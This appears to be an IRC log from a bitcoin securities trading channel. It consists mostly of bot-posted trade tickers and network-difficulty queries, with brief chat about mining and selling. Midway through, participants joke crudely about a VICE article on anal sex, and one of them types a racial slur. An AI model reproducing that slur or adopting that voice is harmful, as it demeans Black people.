21:22:31 [BTCTC] [LABCOIN] 312 @ 0.003719 = 1.1603 BTC [-] Sep 01 21:22:32 [BTCTC] [LABCOIN] 2000 @ 0.003717 = 7.434 BTC [-] Sep 01 21:22:33 [BTCTC] [LABCOIN] 1 @ 0.003714 BTC [-] Sep 01 21:22:34 [BTCTC] [LABCOIN] 112 @ 0.003714 = 0.416 BTC [-] Sep 01 21:22:35 [BTCTC] [LABCOIN] 2017 @ 0.003701 = 7.4649 BTC [-] Sep 01 21:22:37 [BTCTC] [LABCOIN] 2000 @ 0.0037 = 7.4 BTC [-] Sep 01 21:22:37 [BTCTC] [LABCOIN] 183 @ 0.003696 = 0.6764 BTC [-] Sep 01 21:22:38 [BTCTC] [LABCOIN] 6350 @ 0.003695 = 23.4633 BTC [-] Sep 01 21:22:39 [BTCTC] [LABCOIN] 900 @ 0.003692 = 3.3228 BTC [-] Sep 01 21:22:40 [BTCTC] [LABCOIN] 2000 @ 0.00369 = 7.38 BTC [-] Sep 01 21:23:15 [MPEX] [S.MPOE] 11650 @ 0.00086095 = 10.0301 BTC [-] Sep 01 21:23:26 [BTCTC] [LABCOIN] 327 @ 0.003691 = 1.207 BTC [+] Sep 01 21:23:28 [BTCTC] [LABCOIN] 3678 @ 0.003689 = 13.5681 BTC [-] Sep 01 21:25:25 [MPEX] [S.MPOE] [PAID] 889.56345725 BTC to 500`000`000 shares, 177 satoshi per share Sep 01 21:27:03 [HAVELOCK] [XBOND] 9 @ 0.00115 = 0.0104 BTC [-] Sep 01 21:27:32 [HAVELOCK] [SMG] 1 @ 0.00024299 BTC [+] Sep 01 21:27:49 [HAVELOCK] [VTX] 1 @ 0.5899 BTC [+] Sep 01 21:27:53 [HAVELOCK] [VTX] 1 @ 0.59 BTC [+] Sep 01 21:27:55 [HAVELOCK] [VTX] 1 @ 0.595 BTC [+] Sep 01 21:28:20 [HAVELOCK] [VTX] 1 @ 0.595 BTC [+] Sep 01 21:30:07 [BTCTC] [TAT.ASICMINER] 2 @ 0.02393 = 0.0479 BTC [-] Sep 01 21:31:10 acmt hits 0.002 before end of day? Sep 01 21:31:20 [BTCTC] [LABCOIN] 20 @ 0.003784 = 0.0757 BTC [+] Sep 01 21:31:23 [BTCTC] [LABCOIN] 20 @ 0.003692 = 0.0738 BTC [-] Sep 01 21:31:24 [BTCTC] [LABCOIN] 254 @ 0.003691 = 0.9375 BTC [-] Sep 01 21:31:26 [BTCTC] [LABCOIN] 100 @ 0.003691 = 0.3691 BTC [-] Sep 01 21:31:27 [BTCTC] [LABCOIN] 3322 @ 0.003689 = 12.2549 BTC [-] Sep 01 21:31:28 [BTCTC] [LABCOIN] 24 @ 0.003638 = 0.0873 BTC [-] Sep 01 21:31:29 [BTCTC] [LABCOIN] 96 @ 0.003637 = 0.3492 BTC [-] Sep 01 21:31:30 [BTCTC] [LABCOIN] 1025 @ 0.003616 = 3.7064 BTC [-] Sep 01 21:31:31 [BTCTC] [LABCOIN] 1 @ 0.003615 BTC [-] Sep 01 21:31:32 [BTCTC] [LABCOIN] 3121 @ 0.003615 = 11.2824 BTC [-] Sep 01 21:31:33 [BTCTC] [LABCOIN] 980 @ 0.003615 = 3.5427 BTC [-] Sep 01 21:31:34 [BTCTC] [LABCOIN] 2500 @ 0.003613 = 9.0325 BTC [-] Sep 01 21:31:35 [BTCTC] [LABCOIN] 10000 @ 0.003612 = 36.12 BTC [-] Sep 01 21:31:36 [BTCTC] [LABCOIN] 1494 @ 0.003611 = 5.3948 BTC [-] Sep 01 21:31:37 [BTCTC] [LABCOIN] 5000 @ 0.00361 = 18.05 BTC [-] Sep 01 21:31:38 [BTCTC] [LABCOIN] 99 @ 0.003608 = 0.3572 BTC [-] Sep 01 21:31:39 [BTCTC] [LABCOIN] 879 @ 0.003608 = 3.1714 BTC [-] Sep 01 21:31:40 [BTCTC] [LABCOIN] 857 @ 0.003605 = 3.0895 BTC [-] Sep 01 21:31:40 [BTCTC] [LABCOIN] 980 @ 0.003604 = 3.5319 BTC [-] Sep 01 21:31:42 [BTCTC] [LABCOIN] 2450 @ 0.003603 = 8.8274 BTC [-] Sep 01 21:31:43 [BTCTC] [LABCOIN] 3561 @ 0.003602 = 12.8267 BTC [-] Sep 01 21:31:55 [BTCTC] [LABCOIN] 20 @ 0.003785 = 0.0757 BTC [+] Sep 01 21:35:01 [BTCTC] [LABCOIN] 252 @ 0.003789 = 0.9548 BTC [+] Sep 01 21:43:43 [HAVELOCK] [HIM] 30 @ 0.159 = 4.77 BTC [-] Sep 01 21:47:20 [MPEX] [S.MPOE] 5200 @ 0.0008621 = 4.4829 BTC [+] Sep 01 21:49:45 [BTCTC] [TAT.ASICMINER] 90 @ 0.023 = 2.07 BTC [-] Sep 01 21:51:24 https://i.chzbgr.com/maxW500/4563587584/h6339C158/ Sep 01 21:52:38 hah Sep 01 21:55:08 [BTCTC] [BTC-GROWTH] 1 @ 0.09802 BTC [-] Sep 01 21:55:11 [HAVELOCK] [VTX] 2 @ 0.595 = 1.19 BTC [+] Sep 01 21:55:30 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Sep 01 21:55:34 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Sep 01 21:56:00 [BTCTC] [TAT.ASICMINER] 8 @ 0.02264 = 0.1811 BTC [-] Sep 01 21:56:01 [BTCTC] [TAT.ASICMINER] 6 @ 0.02263 = 0.1358 BTC [-] Sep 01 21:56:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.02263 = 0.0679 BTC [-] Sep 01 21:56:03 [BTCTC] [TAT.ASICMINER] 19 @ 0.02263 = 0.43 BTC [-] Sep 01 21:57:41 http://www.vice.com/en_ca/read/why-does-anyone-like-anal-sex Sep 01 21:57:45 Why Girls Should Never Have Anal Sex | VICE Canada Sep 01 21:58:06 why is vice "hiring" all these marginally literate college dropouts to write about shit they've never done/seen/understood ? Sep 01 21:58:30 [BTCTC] [ASICMINER-PT] 1 @ 2.427 BTC [-] Sep 01 22:00:22 [BTCTC] [DMS.SELLING] 15 @ 0.0131 = 0.1965 BTC [+] Sep 01 22:00:43 [BTCTC] [PETA-MINE] 4 @ 0.6526 = 2.6104 BTC [+] Sep 01 22:01:30 [MPEX] [S.MPOE] 7015 @ 0.00086095 = 6.0396 BTC [-] Sep 01 22:02:35 [BTCTC] [ACTIVEMINING] 50 @ 0.003124 = 0.1562 BTC [+] Sep 01 22:02:37 [BTCTC] [ACTIVEMINING] 50 @ 0.003125 = 0.1563 BTC [+] Sep 01 22:02:38 [BTCTC] [ACTIVEMINING] 250 @ 0.003213 = 0.8033 BTC [+] Sep 01 22:03:28 [BTCTC] [ACTIVEMINING] 274 @ 0.003213 = 0.8804 BTC [+] Sep 01 22:03:49 [BTCTC] [ACTIVEMINING] 6 @ 0.003217 = 0.0193 BTC [+] Sep 01 22:06:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.02377 BTC [+] Sep 01 22:06:37 no idea, best part of the article might be the pic of the license plate: anaslex Sep 01 22:06:41 haha Sep 01 22:07:29 "what's the difference anyway ?" "plain sex can make your day but anal sex can make your hole weak" Sep 01 22:08:54 [BTCTC] [ACTIVEMINING] 400 @ 0.003272 = 1.3088 BTC [+] Sep 01 22:09:04 [BTCTC] [ACTIVEMINING] 57 @ 0.003272 = 0.1865 BTC [+] Sep 01 22:09:05 [BTCTC] [ACTIVEMINING] 243 @ 0.003275 = 0.7958 BTC [+] Sep 01 22:09:07 [BTCTC] [DMS.MINING] 50 @ 0.002998 = 0.1499 BTC [+] Sep 01 22:09:10 [BTCTC] [DMS.SELLING] 1 @ 0.01309 BTC [-] Sep 01 22:10:13 [BTCTC] [ACTIVEMINING] 200 @ 0.003275 = 0.655 BTC [+] Sep 01 22:10:15 [BTCTC] [ACTIVEMINING] 14 @ 0.003275 = 0.0459 BTC [+] Sep 01 22:10:16 [BTCTC] [ACTIVEMINING] 354 @ 0.003275 = 1.1594 BTC [+] Sep 01 22:10:21 [BTCTC] [ACTIVEMINING] 30 @ 0.003275 = 0.0983 BTC [+] Sep 01 22:10:23 [BTCTC] [ACTIVEMINING] 20 @ 0.003278 = 0.0656 BTC [+] Sep 01 22:10:42 [BTCTC] [ACTIVEMINING] 322 @ 0.003275 = 1.0546 BTC [-] Sep 01 22:10:42 [BTCTC] [ACTIVEMINING] 30 @ 0.003278 = 0.0983 BTC [+] Sep 01 22:10:43 [BTCTC] [ACTIVEMINING] 50 @ 0.003279 = 0.164 BTC [+] Sep 01 22:10:44 [BTCTC] [ACTIVEMINING] 76 @ 0.003296 = 0.2505 BTC [+] Sep 01 22:11:43 [BTCTC] [TAT.ASICMINER] 45 @ 0.02376 = 1.0692 BTC [-] Sep 01 22:12:09 [BTCTC] [LABCOIN] 20 @ 0.003757 = 0.0751 BTC [-] Sep 01 22:12:59 [BTCTC] [LABCOIN] 20 @ 0.003758 = 0.0752 BTC [+] Sep 01 22:13:00 [BTCTC] [LABCOIN] 30 @ 0.003768 = 0.113 BTC [+] Sep 01 22:14:01 [BTCTC] [ACTIVEMINING] 281 @ 0.003288 = 0.9239 BTC [-] Sep 01 22:14:02 [BTCTC] [ACTIVEMINING] 135 @ 0.003299 = 0.4454 BTC [+] Sep 01 22:14:03 [BTCTC] [ACTIVEMINING] 135 @ 0.0033 = 0.4455 BTC [+] Sep 01 22:14:05 [BTCTC] [ACTIVEMINING] 49 @ 0.003337 = 0.1635 BTC [+] Sep 01 22:14:05 [BTCTC] [ACTIVEMINING] 281 @ 0.003348 = 0.9408 BTC [+] Sep 01 22:14:06 [BTCTC] [ACTIVEMINING] 1110 @ 0.003349 = 3.7174 BTC [+] Sep 01 22:14:07 [BTCTC] [ACTIVEMINING] 1309 @ 0.00335 = 4.3852 BTC [+] Sep 01 22:15:54 [BTCTC] [ACTIVEMINING] 1 @ 0.003347 BTC [-] Sep 01 22:16:09 Mary-Ann Banal is simply butthurt. Sep 01 22:16:52 niggers fault Sep 01 22:18:09 [BTCTC] [ACTIVEMINING] 50 @ 0.003349 = 0.1675 BTC [+] Sep 01 22:18:11 [BTCTC] [ACTIVEMINING] 300 @ 0.00335 = 1.005 BTC [+] Sep 01 22:18:36 [BTCTC] [DMS.SELLING] 75 @ 0.01281 = 0.9608 BTC [-] Sep 01 22:18:37 [BTCTC] [DMS.SELLING] 100 @ 0.0128 = 1.28 BTC [-] Sep 01 22:21:50 [BTCTC] [ACTIVEMINING] 244 @ 0.003397 = 0.8289 BTC [+] Sep 01 22:21:51 [BTCTC] [ACTIVEMINING] 586 @ 0.0034 = 1.9924 BTC [+] Sep 01 22:21:59 [BTCTC] [ACTIVEMINING] 2140 @ 0.0034 = 7.276 BTC [+] Sep 01 22:23:35 [BTCTC] [ACTIVEMINING] 244 @ 0.003497 = 0.8533 BTC [+] Sep 01 22:23:36 [BTCTC] [ACTIVEMINING] 2256 @ 0.0035 = 7.896 BTC [+] Sep 01 22:24:39 [BTCTC] [DMS.SELLING] 270 @ 0.0131 = 3.537 BTC [+] Sep 01 22:24:52 [BTCTC] [ACTIVEMINING] 29 @ 0.003497 = 0.1014 BTC [-] Sep 01 22:28:17 [BTCTC] [DMS.SELLING] 514 @ 0.0131 = 6.7334 BTC [+] Sep 01 22:28:18 [BTCTC] [DMS.SELLING] 55 @ 0.0131 = 0.7205 BTC [+] Sep 01 22:28:19 [BTCTC] [DMS.SELLING] 504 @ 0.01346 = 6.7838 BTC [+] Sep 01 22:29:13 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [+] Sep 01 22:29:36 [BTCTC] [ACTIVEMINING] 35 @ 0.003497 = 0.1224 BTC [-] Sep 01 22:30:31 [BTCTC] [ACTIVEMINING] 50 @ 0.003497 = 0.1749 BTC [-] Sep 01 22:32:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02262 = 0.0452 BTC [-] Sep 01 22:32:29 [BTCTC] [COGNITIVE] 1 @ 0.2597 BTC [+] Sep 01 22:32:31 [BTCTC] [ACTIVEMINING] 1 @ 0.003497 BTC [-] Sep 01 22:33:38 [BTCTC] [COGNITIVE] 1 @ 0.2501 BTC [-] Sep 01 22:34:05 [BTCTC] [PETA-MINE] 6 @ 0.65 = 3.9 BTC [-] Sep 01 22:34:37 [BTCTC] [ACTIVEMINING] 6 @ 0.003497 = 0.021 BTC [-] Sep 01 22:35:00 [BTCTC] [LABCOIN] 9 @ 0.003716 = 0.0334 BTC [-] Sep 01 22:35:25 [MPEX] [S.MPOE] 2203 @ 0.0008621 = 1.8992 BTC [+] Sep 01 22:35:56 [BTCTC] [ACTIVEMINING] 10 @ 0.003497 = 0.035 BTC [-] Sep 01 22:36:34 [BTCTC] [ACTIVEMINING] 1 @ 0.003496 BTC [-] Sep 01 22:38:52 [MPEX] [S.MPOE] 5950 @ 0.0008625 = 5.1319 BTC [+] Sep 01 22:39:08 [BTCTC] [LABCOIN] 497 @ 0.003768 = 1.8727 BTC [+] Sep 01 22:39:10 [BTCTC] [LABCOIN] 382 @ 0.00377 = 1.4401 BTC [+] Sep 01 22:39:11 [BTCTC] [DMS.PURCHASE] 440 @ 0.01585 = 6.974 BTC [-] Sep 01 22:39:21 [BTCTC] [ACTIVEMINING] 47 @ 0.003497 = 0.1644 BTC [+] Sep 01 22:39:31 [BTCTC] [LABCOIN] 497 @ 0.003768 = 1.8727 BTC [-] Sep 01 22:39:32 [BTCTC] [LABCOIN] 103 @ 0.00377 = 0.3883 BTC [+] Sep 01 22:39:54 [BTCTC] [LABCOIN] 12 @ 0.00377 = 0.0452 BTC [+] Sep 01 22:40:39 [BTCTC] [ACTIVEMINING] 35 @ 0.003497 = 0.1224 BTC [+] Sep 01 22:40:51 [BTCTC] [LABCOIN] 5 @ 0.003792 = 0.019 BTC [+] Sep 01 22:41:48 [BTCTC] [DMS.MINING] 250 @ 0.00279 = 0.6975 BTC [-] Sep 01 22:41:50 [BTCTC] [DMS.MINING] 190 @ 0.002789 = 0.5299 BTC [-] Sep 01 22:42:16 [BTCTC] [DMS.PURCHASE] 80 @ 0.01585 = 1.268 BTC [-] Sep 01 22:44:04 [BTCTC] [DMS.MINING] 30 @ 0.002789 = 0.0837 BTC [-] Sep 01 22:44:05 [BTCTC] [DMS.MINING] 50 @ 0.002788 = 0.1394 BTC [-] Sep 01 22:44:43 [HAVELOCK] [AM100] 4 @ 0.02389 = 0.0956 BTC [-] Sep 01 22:47:42 [BTCTC] [ACTIVEMINING] 402 @ 0.003256 = 1.3089 BTC [-] Sep 01 22:47:43 [BTCTC] [ACTIVEMINING] 100 @ 0.003253 = 0.3253 BTC [-] Sep 01 22:48:13 [BTCTC] [ACTIVEMINING] 10 @ 0.003257 = 0.0326 BTC [+] Sep 01 22:48:15 [BTCTC] [ACTIVEMINING] 1 @ 0.003241 BTC [-] Sep 01 22:48:16 [BTCTC] [ACTIVEMINING] 1 @ 0.00324 BTC [-] Sep 01 22:48:17 [BTCTC] [ACTIVEMINING] 5 @ 0.00324 = 0.0162 BTC [-] Sep 01 22:48:19 [BTCTC] [ACTIVEMINING] 252 @ 0.003204 = 0.8074 BTC [-] Sep 01 22:48:55 [BTCTC] [ACTIVEMINING] 150 @ 0.003204 = 0.4806 BTC [-] Sep 01 22:48:56 [BTCTC] [ACTIVEMINING] 50 @ 0.003201 = 0.1601 BTC [-] Sep 01 22:48:57 [BTCTC] [ACTIVEMINING] 29 @ 0.0032 = 0.0928 BTC [-] Sep 01 22:49:46 [BTCTC] [LABCOIN] 250 @ 0.00378 = 0.945 BTC [-] Sep 01 22:55:19 [HAVELOCK] [XBOND] 1 @ 0.00115 BTC [-] Sep 01 22:55:35 [HAVELOCK] [XBOND] 1 @ 0.00108 BTC [-] Sep 01 22:57:21 [BTCTC] [LABCOIN] 323 @ 0.003768 = 1.2171 BTC [-] Sep 01 22:57:30 3000 tx fees is a huge loss for zhoutong Sep 01 22:57:53 [HAVELOCK] [XBOND] 1 @ 0.00107 BTC [-] Sep 01 22:57:57 [HAVELOCK] [XBOND] 4 @ 0.00107 = 0.0043 BTC [-] Sep 01 22:59:20 [BTCTC] [LABCOIN] 9 @ 0.003766 = 0.0339 BTC [-] Sep 01 22:59:21 [BTCTC] [LABCOIN] 278 @ 0.003767 = 1.0472 BTC [+] Sep 01 23:00:02 [MPEX] [S.MPOE] 8747 @ 0.0008625 = 7.5443 BTC [+] Sep 01 23:00:09 [BTCTC] [LABCOIN] 278 @ 0.003794 = 1.0547 BTC [+] Sep 01 23:01:15 [BTCTC] [LABCOIN] 278 @ 0.003792 = 1.0542 BTC [-] Sep 01 23:01:16 [BTCTC] [LABCOIN] 13 @ 0.003794 = 0.0493 BTC [+] Sep 01 23:02:56 [BTCTC] [ACTIVEMINING] 100 @ 0.003474 = 0.3474 BTC [+] Sep 01 23:06:38 [BTCTC] [DMS.MINING] 1 @ 0.002998 BTC [+] Sep 01 23:07:22 [MPEX] [S.MPOE] 6777 @ 0.00086215 = 5.8428 BTC [-] Sep 01 23:07:24 [MPEX] [S.MPOE] 3273 @ 0.0008635 = 2.8262 BTC [+] Sep 01 23:09:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0008477 = 0.0017 BTC [+] Sep 01 23:22:14 [BTCTC] [ACTIVEMINING] 2 @ 0.003432 = 0.0069 BTC [-] Sep 01 23:25:39 [MPEX] [S.MPOE] 6000 @ 0.00086186 = 5.1712 BTC [-] Sep 01 23:25:41 [MPEX] [S.MPOE] 7700 @ 0.00086095 = 6.6293 BTC [-] Sep 01 23:29:27 [BTCTC] [PETA-MINE] 15 @ 0.65 = 9.75 BTC [-] Sep 01 23:29:48 [BTCTC] [DMS.MINING] 23 @ 0.002998 = 0.069 BTC [+] Sep 01 23:36:00 [BTCTC] [ACTIVEMINING] 29 @ 0.003237 = 0.0939 BTC [-] Sep 01 23:46:46 [BTCTC] [PETA-MINE] 100 @ 0.65 = 65 BTC [-] Sep 01 23:47:48 [HAVELOCK] [AM100] 1 @ 0.02389 BTC [-] Sep 01 23:49:47 [BTCTC] [ACTIVEMINING] 2 @ 0.003251 = 0.0065 BTC [+] Sep 01 23:49:50 [BTCTC] [ACTIVEMINING] 3 @ 0.00325 = 0.0098 BTC [-] Sep 01 23:50:07 [BTCTC] [PETA-MINE] 10 @ 0.65 = 6.5 BTC [-] Sep 01 23:51:06 [BTCTC] [ACTIVEMINING] 2 @ 0.003251 = 0.0065 BTC [+] Sep 01 23:51:08 [BTCTC] [ACTIVEMINING] 7 @ 0.00325 = 0.0228 BTC [-] Sep 01 23:51:09 [BTCTC] [ACTIVEMINING] 9 @ 0.003179 = 0.0286 BTC [-] Sep 01 23:52:11 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [-] Sep 01 23:54:57 [HAVELOCK] [SDSTM] 5 @ 0.00371 = 0.0186 BTC [-] Sep 01 23:58:25 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [-] Sep 02 00:01:18 [BTCTC] [BTC-GROWTH] 1 @ 0.1025 BTC [+] Sep 02 00:06:12 [BTCTC] [TAT.ASICMINER] 40 @ 0.02266 = 0.9064 BTC [+] Sep 02 00:06:13 [BTCTC] [TAT.ASICMINER] 110 @ 0.02265 = 2.4915 BTC [-] Sep 02 00:06:15 [BTCTC] [DMS.MINING] 8 @ 0.002998 = 0.024 BTC [+] Sep 02 00:14:14 [BTCTC] [ASICMINER-PT] 3 @ 2.43 = 7.29 BTC [+] Sep 02 00:14:15 [BTCTC] [ASICMINER-PT] 1 @ 2.428 BTC [-] Sep 02 00:14:17 [BTCTC] [ASICMINER-PT] 3 @ 2.426 = 7.278 BTC [-] Sep 02 00:14:18 [BTCTC] [ASICMINER-PT] 4 @ 2.426 = 9.704 BTC [-] Sep 02 00:14:18 [BTCTC] [ASICMINER-PT] 2 @ 2.425 = 4.85 BTC [-] Sep 02 00:14:19 [BTCTC] [ASICMINER-PT] 2 @ 2.424 = 4.848 BTC [-] Sep 02 00:14:20 [BTCTC] [ASICMINER-PT] 5 @ 2.423 = 12.115 BTC [-] Sep 02 00:18:05 [BTCTC] [LABCOIN] 63 @ 0.003792 = 0.2389 BTC [-] Sep 02 00:21:00 [MPEX] [S.MPOE] 8200 @ 0.00086135 = 7.0631 BTC [+] Sep 02 00:21:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.02361 = 0.2361 BTC [+] Sep 02 00:22:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.0236 = 0.236 BTC [-] Sep 02 00:22:59 [BTCTC] [ACTIVEMINING] 10 @ 0.003231 = 0.0323 BTC [+] Sep 02 00:24:34 [BTCTC] [BASIC-MINING] 1 @ 0.1789 BTC [-] Sep 02 00:24:35 [BTCTC] [BASIC-MINING] 2 @ 0.179 = 0.358 BTC [+] Sep 02 00:26:00 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] Sep 02 00:26:01 [BTCTC] [ASICMINER-PT] 1 @ 2.478 BTC [+] Sep 02 00:34:48 ;;calc 889.56345725/500000000 Sep 02 00:34:49 1.7791269145e-06 Sep 02 00:35:26 almost 178 satoshi Sep 02 00:36:28 [BTCTC] [LABCOIN] 50 @ 0.003792 = 0.1896 BTC [-] Sep 02 00:40:20 [MPEX] [S.MPOE] 1800 @ 0.00086135 = 1.5504 BTC [+] Sep 02 00:40:21 [MPEX] [S.MPOE] 8500 @ 0.0008635 = 7.3398 BTC [+] Sep 02 00:40:34 [BTCTC] [ACTIVEMINING] 10 @ 0.003216 = 0.0322 BTC [-] Sep 02 00:40:36 [BTCTC] [ACTIVEMINING] 2 @ 0.003215 = 0.0064 BTC [-] Sep 02 00:40:37 [BTCTC] [ACTIVEMINING] 1 @ 0.003211 BTC [-] Sep 02 00:40:38 [BTCTC] [ACTIVEMINING] 4 @ 0.00321 = 0.0128 BTC [-] Sep 02 00:40:39 [BTCTC] [ACTIVEMINING] 2 @ 0.00321 = 0.0064 BTC [-] Sep 02 00:40:41 [BTCTC] [ACTIVEMINING] 312 @ 0.003159 = 0.9856 BTC [-] Sep 02 00:40:42 [BTCTC] [ACTIVEMINING] 78 @ 0.003156 = 0.2462 BTC [-] Sep 02 00:40:43 [BTCTC] [ACTIVEMINING] 25 @ 0.00312 = 0.078 BTC [-] Sep 02 00:40:44 [BTCTC] [ACTIVEMINING] 100 @ 0.003119 = 0.3119 BTC [-] Sep 02 00:40:45 [BTCTC] [ACTIVEMINING] 12 @ 0.003115 = 0.0374 BTC [-] Sep 02 00:40:45 [BTCTC] [ACTIVEMINING] 48 @ 0.003114 = 0.1495 BTC [-] Sep 02 00:40:46 [BTCTC] [ACTIVEMINING] 1727 @ 0.003104 = 5.3606 BTC [-] Sep 02 00:40:47 [BTCTC] [ACTIVEMINING] 3679 @ 0.003103 = 11.4159 BTC [-] Sep 02 00:41:07 ;;nethash Sep 02 00:41:08 728440.651144 Sep 02 00:42:01 [BTCTC] [LABCOIN] 10 @ 0.003738 = 0.0374 BTC [-] Sep 02 00:42:02 [BTCTC] [LABCOIN] 90 @ 0.003737 = 0.3363 BTC [-] Sep 02 00:42:42 [HAVELOCK] [XBOND] 16 @ 0.00107 = 0.0171 BTC [-] Sep 02 00:42:46 [HAVELOCK] [XBOND] 20 @ 0.001063 = 0.0213 BTC [-] Sep 02 00:42:49 [HAVELOCK] [XBOND] 1 @ 0.00106111 BTC [-] Sep 02 00:42:53 [HAVELOCK] [XBOND] 10 @ 0.001061 = 0.0106 BTC [-] Sep 02 00:42:57 [HAVELOCK] [XBOND] 1 @ 0.001061 BTC [-] Sep 02 00:42:59 [HAVELOCK] [XBOND] 100 @ 0.0010601 = 0.106 BTC [-] Sep 02 00:43:03 [HAVELOCK] [XBOND] 10 @ 0.00106 = 0.0106 BTC [-] Sep 02 00:43:06 [HAVELOCK] [XBOND] 6 @ 0.00105 = 0.0063 BTC [-] Sep 02 00:43:10 [HAVELOCK] [XBOND] 10 @ 0.00105 = 0.0105 BTC [-] Sep 02 00:43:14 [HAVELOCK] [XBOND] 2 @ 0.001047 = 0.0021 BTC [-] Sep 02 00:43:17 [HAVELOCK] [XBOND] 25 @ 0.00104011 = 0.026 BTC [-] Sep 02 00:43:21 [HAVELOCK] [XBOND] 1050 @ 0.0010401 = 1.0921 BTC [-] Sep 02 00:43:25 [HAVELOCK] [XBOND] 10 @ 0.00104 = 0.0104 BTC [-] Sep 02 00:43:28 [HAVELOCK] [XBOND] 30 @ 0.00103501 = 0.0311 BTC [-] Sep 02 00:43:32 [HAVELOCK] [XBOND] 6858 @ 0.001035 = 7.098 BTC [-] Sep 02 00:43:35 [HAVELOCK] [XBOND] 10 @ 0.0010318 = 0.0103 BTC [-] Sep 02 00:43:38 [HAVELOCK] [XBOND] 2000 @ 0.00103071 = 2.0614 BTC [-] Sep 02 00:43:42 [HAVELOCK] [XBOND] 25 @ 0.00103 = 0.0258 BTC [-] Sep 02 00:43:45 [HAVELOCK] [XBOND] 10 @ 0.00103 = 0.0103 BTC [-] Sep 02 00:43:49 [HAVELOCK] [XBOND] 5796 @ 0.00103 = 5.9699 BTC [-] Sep 02 00:45:44 ;;bc,stats Sep 02 00:45:46 Current Blocks: 255557 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 474 blocks | Next Difficulty In About: 2 days, 4 hours, 39 minutes, and 59 seconds | Next Difficulty Estimate: 84657928.8208 | Estimated Percent Change: 28.75719 Sep 02 00:49:19 [BTCTC] [DMS.PURCHASE] 73 @ 0.01585 = 1.1571 BTC [-] Sep 02 00:51:05 [BTCTC] [TAT.ASICMINER] 18 @ 0.02266 = 0.4079 BTC [-] Sep 02 00:51:18 [BTCTC] [CB.IDIFF-E] 990 @ 0.022 = 21.78 BTC [-] Sep 02 00:51:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.02265 = 0.2039 BTC [-] Sep 02 00:51:50 screw dat. no way will the diff be onder 200m in october Sep 02 00:52:53 ;;nethash Sep 02 00:52:54 727742.685894 Sep 02 00:52:59 wat Sep 02 00:53:14 thats doubled in a week? Sep 02 00:53:47 [MPEX] [S.MPOE] 235 @ 0.00086095 = 0.2023 BTC [-] Sep 02 00:53:49 [MPEX] [S.MPOE] 12600 @ 0.00085949 = 10.8296 BTC [-] Sep 02 00:53:51 [MPEX] [S.MPOE] 4815 @ 0.00085587 = 4.121 BTC [-] Sep 02 00:54:44 [BTCTC] [ACTIVEMINING] 5 @ 0.003114 = 0.0156 BTC [+] Sep 02 00:54:44 it's possible i'll lose even selling for 0.029 ... crazy Sep 02 00:54:44 [BTCTC] [ACTIVEMINING] 268 @ 0.003113 = 0.8343 BTC [-] Sep 02 00:54:45 [BTCTC] [ACTIVEMINING] 275 @ 0.00311 = 0.8553 BTC [-] Sep 02 00:54:46 [BTCTC] [ACTIVEMINING] 619 @ 0.003103 = 1.9208 BTC [-] Sep 02 00:55:19 but that 0.022 a dude offered... couldn't resist Sep 02 00:56:14 [BTCTC] [LABCOIN] 10 @ 0.003741 = 0.0374 BTC [+] Sep 02 00:56:16 [BTCTC] [LABCOIN] 70 @ 0.00374 = 0.2618 BTC [-] Sep 02 00:56:18 [BTCTC] [LABCOIN] 240 @ 0.003711 = 0.8906 BTC [-] Sep 02 00:58:42 [BTCTC] [BASIC-MINING] 1 @ 0.1797 BTC [+] Sep 02 00:59:05 aww i missed some at 22? Sep 02 00:59:23 still risky, but worth considering Sep 02 00:59:28 yea i said ThickAsThieves "mind you" today Sep 02 00:59:37 i was out all day Sep 02 00:59:50 in the morning... anf you did check the diff but nothing happened Sep 02 01:00:19 yeah i havent really read the room today, no biggie Sep 02 01:05:26 [BTCTC] [DMS.MINING] 10 @ 0.002997 = 0.03 BTC [-] Sep 02 01:09:28 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [-] Sep 02 01:11:42 [BTCTC] [PETA-MINE] 1 @ 0.6526 BTC [+] Sep 02 01:29:11 [BTCTC] [COGNITIVE] 1 @ 0.2799 BTC [+] Sep 02 01:30:14 ;;bcstats Sep 02 01:30:17 Current Blocks: 255560 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 471 blocks | Next Difficulty In About: 2 days, 3 hours, 22 minutes, and 54 seconds | Next Difficulty Estimate: 84521034.6402 | Estimated Percent Change: 28.54898 Sep 02 01:32:15 [BTCTC] [DMS.MINING] 27 @ 0.002997 = 0.0809 BTC [-] Sep 02 01:32:46 [BTCTC] [LABCOIN] 10 @ 0.003712 = 0.0371 BTC [+] Sep 02 01:32:48 [BTCTC] [LABCOIN] 205 @ 0.003711 = 0.7608 BTC [-] Sep 02 01:32:49 [BTCTC] [LABCOIN] 200 @ 0.00371 = 0.742 BTC [-] Sep 02 01:32:50 [BTCTC] [LABCOIN] 1585 @ 0.0037 = 5.8645 BTC [-] Sep 02 01:34:36 [BTCTC] [BFMINES] 1 @ 0.003499 BTC [+] Sep 02 01:35:25 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [-] Sep 02 01:40:17 [BTCTC] [ASICMINER-PT] 4 @ 2.46 = 9.84 BTC [-] Sep 02 01:41:40 ;;bcstats Sep 02 01:41:42 Current Blocks: 255561 | Current Difficulty: 6.5750060149084814E7 | Next Difficulty At Block: 256031 | Next Difficulty In: 470 blocks | Next Difficulty In About: 2 days, 3 hours, 16 minutes, and 21 seconds | Next Difficulty Estimate: 84516897.8567 | Estimated Percent Change: 28.54269 Sep 02 01:43:31 [BTCTC] [LABCOIN] 10 @ 0.003758 = 0.0376 BTC [+] Sep 02 01:43:44 [BTCTC] [LABCOIN] 10 @ 0.003758 = 0.0376 BTC [+] Sep 02 01:44:24 [BTCTC] [ACTIVEMINING] 10 @ 0.003144 = 0.0314 BTC [+] Sep 02 01:45:09 ;;ticker Sep 02 01:45:13 MtGox BTCUSD 